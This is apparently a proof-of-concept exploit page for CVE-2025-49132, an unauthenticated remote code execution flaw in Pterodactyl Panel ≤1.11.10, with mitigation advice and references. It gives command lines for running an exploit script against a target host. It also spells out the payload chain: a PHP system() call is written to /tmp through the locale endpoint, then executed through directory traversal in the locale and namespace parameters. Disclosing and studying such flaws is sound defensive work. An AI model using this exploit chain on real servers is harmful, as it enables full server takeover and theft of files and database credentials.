CVE-2025-49132 Pterodactyl Panel - Unauthenticated Remote Code Execution (RCE)
PoC exploit for CVE-2025-49132 (GHSA-24wv-6c99-f843) – Unauthenticated Remote Code Execution in Pterodactyl Panel ≤ 1.11.10
CVE-2025-49132
Pterodactyl Panel - Unauthenticated Remote Code Execution (RCE)
🔎 Summary
CVE‑2025‑49132 is a critical Remote Code Execution vulnerability affecting Pterodactyl Panel <= 1.11.10.
An unauthenticated attacker can exploit improper input validation in
the /locales/locale.json endpoint to execute arbitrary system commands.
Patched in version: 1.11.11
📌 Impact
Successful exploitation allows:
- Unauthenticated Remote Code Execution
- Reading sensitive files (e.g.,
.env) - Database credential extraction
- Full server compromise
Severity: Critical
🧠 Root Cause
The vulnerability exists due to improper validation of:
localeparameternamespaceparameter
An attacker can:
- Abuse directory traversal (
../../../../../) - Leverage
config-create - Write arbitrary PHP payloads to
/tmp - Trigger execution via crafted namespace loading
Weakness Classification: CWE-94 – Improper Control of Code Generation
GITHUB LINK
🚀 Proof of Concept (PoC)
Usage
1
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]
Examples
1
2
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
Default path:
1
/usr/share/php/PEAR
Get Proper Path from /phpinfo.php page
🛠 Exploitation Flow
Step 1 - Write Payload
The attacker injects a malicious PHP payload into /tmp/payload.php
using:
1
/<?=system('id')?>+/tmp/payload.php
Step 2 — Trigger Execution
By calling:
1
?locale=../../../../../tmp&namespace=payload
The server executes the injected PHP.
🛡 Mitigation
- Upgrade to Pterodactyl Panel >= 1.11.11
- Sanitize
localeandnamespaceinputs - Disable dangerous PHP functions
- Restrict unnecessary endpoint exposure
📚 References
- GitHub Advisory: GHSA-24wv-6c99-f843
- CVE-2025-49132
- Pterodactyl Panel v1.11.11 Patch Commit